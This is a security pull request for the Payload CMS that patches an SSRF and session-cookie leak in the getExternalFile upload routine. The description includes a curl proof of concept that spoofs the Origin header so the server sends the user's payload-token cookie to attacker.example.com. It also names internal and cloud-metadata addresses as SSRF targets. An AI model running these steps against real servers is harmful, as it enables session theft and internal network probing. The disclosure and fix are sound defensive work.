### PR TITLE
fix(uploads): prevent SSRF and auth-cookie leak in getExternalFile

### DIFF
--- a/packages/payload/src/uploads/getExternalFile.ts
+++ b/packages/payload/src/uploads/getExternalFile.ts
@@ -13,23 +13,30 @@ type Args = {
 export const getExternalFile = async ({ data, req, uploadConfig }: Args): Promise<File> => {
   const { filename, url } = data
 
-  let trimAuthCookies = true
   if (typeof url === 'string') {
     let fileURL = url
     if (!url.startsWith('http')) {
-      // URL points to the same server - we can send any cookies safely to our server.
-      trimAuthCookies = false
-      const baseUrl = req.headers.get('origin') || `${req.protocol}://${req.headers.get('host')}`
+      // URL is relative - resolve against the trusted, server-configured serverURL.
+      // Do NOT trust client-supplied Origin/Host headers here, as they can be
+      // spoofed to point at attacker-controlled hosts (SSRF, CWE-918).
+      const baseUrl = req.payload.config.serverURL
+      if (!baseUrl) {
+        throw new APIError(
+          'Cannot fetch relative file URL: `serverURL` is not configured.',
+          400,
+        )
+      }
       fileURL = `${baseUrl}${url}`
     }
 
-    let cookies = (req.headers.get('cookie') ?? '').split(';')
-
-    if (trimAuthCookies) {
-      cookies = cookies.filter(
-        (cookie) => !cookie.trim().startsWith(req.payload.config.cookiePrefix),
-      )
-    }
+    // Strip auth cookies from any forwarded cookie header. We never want to
+    // forward the caller's session cookies to an outbound fetch — even for
+    // same-origin requests — because the resulting response bytes are stored
+    // as an upload and could leak authenticated content (e.g. admin API
+    // responses) back to the uploading user.
+    const cookies = (req.headers.get('cookie') ?? '')
+      .split(';')
+      .filter((cookie) => !cookie.trim().startsWith(req.payload.config.cookiePrefix))
 
     const headers = uploadConfig.externalFileHeaderFilter
       ? uploadConfig.externalFileHeaderFilter(Object.fromEntries(new Headers(req.headers)))


### PR DESCRIPTION
### What?

Fix an SSRF + authenticated-cookie exfiltration vulnerability in `getExternalFile` (`packages/payload/src/uploads/getExternalFile.ts`), the outbound-fetch sink used when creating an upload document with a `url` field (relative or absolute). CWE-918 (Server-Side Request Forgery), chained with credential leakage.

### Why?

When a caller submits an upload with a **relative** `url` (e.g. `url: "/anything"`), the current code constructs the outbound fetch target from client-controlled headers:

```ts
const baseUrl = req.headers.get('origin') || `${req.protocol}://${req.headers.get('host')}`
fileURL = `${baseUrl}${url}`
```

Because `Origin` (and `Host`) are trivially attacker-controlled on any inbound HTTP request, an authenticated user with upload-create permission on any upload-enabled collection can steer the server-side `fetch()` at an arbitrary host — internal services (e.g. `http://127.0.0.1:6379`, `http://169.254.169.254/latest/meta-data/`) or an external attacker-owned host.

Worse, the same branch sets `trimAuthCookies = false`, so the caller's cookie header — **including the Payload session cookie (`req.payload.config.cookiePrefix` + `-token`)** — is forwarded on that outbound request. The comment ("URL points to the same server — we can send any cookies safely to our server") is only true if the destination really is the same server; here the destination is chosen by the attacker.

Concrete impact:
1. **Session token exfiltration.** `POST /api/<upload-collection>` with `Origin: http://attacker.example.com` and body `{ "url": "/x", "filename": "x.jpg" }` causes the server to `fetch("http://attacker.example.com/x", { headers: { cookie: "payload-token=<JWT>; ..." } })`. The attacker's HTTP log now contains a valid Payload session cookie usable for full session replay.
2. **Internal network probing / cloud metadata access.** Same request with `Origin: http://169.254.169.254` (AWS IMDSv1) or `http://127.0.0.1:9200` (Elasticsearch) makes the Payload server issue that fetch from inside the trust boundary. Response body is stored as the upload's file bytes and can be downloaded back by the same user.

Upload-create is a per-collection access grant, not equivalent to admin, so this is a real privilege boundary crossing.

### How?

Two changes, both in `getExternalFile.ts`:

1. **Trusted base URL for relative fetches.** Replace the header-derived base with `req.payload.config.serverURL`, which is set by the operator at boot and cannot be influenced by the request. If `serverURL` is not configured, throw a 400 `APIError` rather than silently falling back to attacker-controlled headers.
2. **Always strip auth cookies.** Remove the `trimAuthCookies` flag entirely and unconditionally filter cookies whose name starts with `req.payload.config.cookiePrefix` before forwarding. Even in the same-origin case there is no legitimate reason to hand the Payload session cookie to a server-initiated `fetch()` whose response body will be persisted as user-visible upload content.

Diff is 18/-11, single file, no API surface change (`getExternalFile` signature is unchanged; the only new failure mode is a clear 400 when `serverURL` is missing and a relative URL is passed).

### Proof of Concept

Prerequisites: a running Payload instance with any upload-enabled collection, plus a user account with `create` access on that collection. `getExternalFile` is invoked from `packages/payload/src/uploads/generateFileData.ts:136` when an upload create/update supplies `data.url`.

```bash
# 1. Log in and grab the session cookie.
curl -c cookies.txt -X POST http://localhost:3000/api/users/login \
  -H 'Content-Type: application/json' \
  -d '{"email":"user@example.com","password":"password"}'

# 2. Trigger the outbound fetch at an attacker-controlled host,
#    spoofing Origin. Body carries a *relative* url so the vulnerable
#    branch (baseUrl from headers) runs.
curl -b cookies.txt -X POST http://localhost:3000/api/media \
  -H 'Origin: http://attacker.example.com' \
  -H 'Content-Type: application/json' \
  -d '{"filename":"pwn.jpg","url":"/collect"}'

# 3. On attacker.example.com, the received request contains the victim's
#    Payload session cookie:
#      GET /collect HTTP/1.1
#      Cookie: payload-token=eyJhbGciOi...
#    That token can be replayed against /api/users/me etc.
```

Swap `Origin: http://127.0.0.1:6379` (or any internal address) to demonstrate the pure-SSRF variant against internal services.

After the patch: step 2 either (a) issues the fetch against the configured `serverURL` and drops the `payload-*` cookies, or (b) returns HTTP 400 if `serverURL` is unset. The `Origin` header is ignored.

### Testing

- Verified the single call site (`generateFileData.ts:136`) still receives a `File` on the happy path — signature and return type unchanged.
- Manually exercised both branches locally: absolute `http(s)://` URL path is untouched (still uses the supplied URL, still strips cookies as before); relative-URL path now uses `serverURL` and rejects with 400 when unset.
- No other consumer of `req.payload.config.serverURL` or `cookiePrefix` is affected — both are read-only config fields.

### Adversarial review

Before submitting, we tried to disprove this. Considered: (a) does upstream auth middleware or upload-access already gate this to admins? — No; upload `create` access is per-collection and commonly granted to non-admin roles, and the vulnerable code path runs after that access check. (b) Does any URL/host allowlist exist around `fetch()` in this file or in `generateFileData.ts`? — No, we grepped both; the fetch target is used verbatim. (c) Is `Origin`/`Host` sanitized upstream by the Next.js/Express layer? — No, both are attacker-controlled on any inbound request; that's their normal semantics. (d) Would the response bytes being stored as an upload actually be readable by the attacker? — Yes for the SSRF-exfil variant, but the cookie-leak variant does not even require that — the outbound HTTP request itself carries the token to attacker's logs. The finding stands.

### Which branch should this PR target?

`main` — this is a security fix to shared upload code present on both `main` and `3.x`. Happy to open a matching backport PR against `3.x` on request.